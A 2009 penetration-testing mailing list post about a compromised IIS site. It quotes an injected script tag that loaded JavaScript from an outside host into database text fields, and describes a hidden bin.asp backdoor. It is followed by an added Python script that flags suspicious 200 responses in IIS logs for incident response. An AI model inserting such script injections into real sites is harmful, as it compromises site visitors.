Penetration Testing mailing list archives

RE: Smells Funny: Looking for help against Chinese Hacking Team


From: northbayts () hushmail com
Date: Sun, 11 Jan 2009 16:47:49 -0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Does anyone else get the same sort of creepy-crawly feeling? When I
> look at the way it was written, and the obvious vulnerabilities/clues
> given, it smells too good to be true.

Nah, it's true. This tag was inserted into the text fields of his SQL DB:

<script>-id=http--dbios.org/h.js></script>.

Dozens of his pages came up on Google at that time; they seem to be
clean now...

> Or is this level of innate incompetence the norm?

Yes. It was easy enough to obtain the admin credentials due to a
coding error on his info request page. I suspect there were many
more coding errors, and who knows what was added to the box in its
vulnerable state.


Some more info from the owner:

> Basically we have a request for a non-existent page.
> Instead of returning a 404, the IIS log reports a 200, usually from a
> Chinese IP address that is not among the 32,000 I currently ban.
> I can find the page on the file system in some cases, but it's
> usually not anywhere below the web root. It has in one case been in
> the Recycler. Once the page is renamed from bin.asp -> bin.asp_hacked,
> the requests stop soon thereafter. One more feature is that the
> attack requests are viewable in Internet Explorer.

Cheers,

n00b_pt

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAklqkzcACgkQOxwoc/IbnabVEAQAiuF9ajxPL6NDy8bDYyGm1+vBalHy
NoDkUJ+TvEp8TPXZN4SfyPy2ICbT6+2RRVhLITycWxfLOon0P2KuHDEZmB0soqiV+1J/
M2TUXgoj/9oft47mzetXdhzIcHjq0AYLMGRjfOu/qZXzN/qK0vX7/bNqpHrnC6CRXQT9
02Dcluw=
=3HqB
-----END PGP SIGNATURE-----
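One way to automate the check the owner describes above (a 200 logged for a URI that has no file under the web root), as an added example in Python that is not part of the original thread. The IIS W3C log lines, the throwaway web root layout and the IP addresses are constructed for the example; on a real box you would point `find_phantom_200s` at the actual log file and wwwroot.

```python
"""Flag IIS log entries that returned 200 for a URI with no file under the
web root. Added example; the log sample and web root below are constructed."""
import os
import tempfile
from urllib.parse import unquote

# Constructed IIS W3C extended log (not from the original post). IIS writes
# the user agent with '+' instead of spaces, so every field is one token.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-01-10 03:12:44 10.0.0.5 GET /index.asp - 80 - 192.0.2.10 Mozilla/4.0 200 0 0
2009-01-10 03:12:45 10.0.0.5 GET /missing.asp - 80 - 192.0.2.10 Mozilla/4.0 404 0 2
2009-01-10 03:15:02 10.0.0.5 GET /bin.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-01-10 03:15:09 10.0.0.5 POST /bin.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-01-10 03:16:00 10.0.0.5 GET /images/logo.gif - 80 - 192.0.2.11 Mozilla/4.0 200 0 0
2009-01-10 03:17:30 10.0.0.5 GET /../../recycler/bin.asp - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per data row, using the column names from '#Fields:'."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # skip malformed rows rather than guess the columns
        yield dict(zip(fields, parts))


def uri_to_path(web_root, uri_stem):
    """Map a URI stem to a path under web_root; None if it escapes the root."""
    rel = unquote(uri_stem).lstrip("/").replace("/", os.sep)
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, rel))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


def find_phantom_200s(log_text, web_root):
    """Return rows that got sc-status 200 although nothing on disk backs them.

    A directory counts as backing (default document), a file counts, and
    anything that resolves outside the web root is always reported.
    """
    hits = []
    for row in parse_w3c(log_text):
        if row.get("sc-status") != "200":
            continue
        path = uri_to_path(web_root, row["cs-uri-stem"])
        if path is None or not os.path.exists(path):
            hits.append(row)
    return hits


def demo():
    """Build a throwaway web root holding the legitimate files, run the check."""
    root = tempfile.mkdtemp(prefix="wwwroot_")
    os.makedirs(os.path.join(root, "images"))
    for name in ("index.asp", os.path.join("images", "logo.gif")):
        with open(os.path.join(root, name), "w") as fh:
            fh.write("x")
    hits = find_phantom_200s(SAMPLE_LOG, root)
    return [(h["c-ip"], h["cs-method"], h["cs-uri-stem"]) for h in hits]


if __name__ == "__main__":
    for ip, method, uri in demo():
        print(f"{ip} {method} {uri}")
```

A hit means IIS served something for a path that has no file under wwwroot, which is exactly the owner's symptom: the handler lives in a virtual directory, an ISAPI mapping, or (as he found) outside the web root or in the Recycler. Virtual directories, URL rewriting and default documents other than a plain file will show up as false positives, so treat the list as a starting point for `dir /s` on the server rather than as proof on its own.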
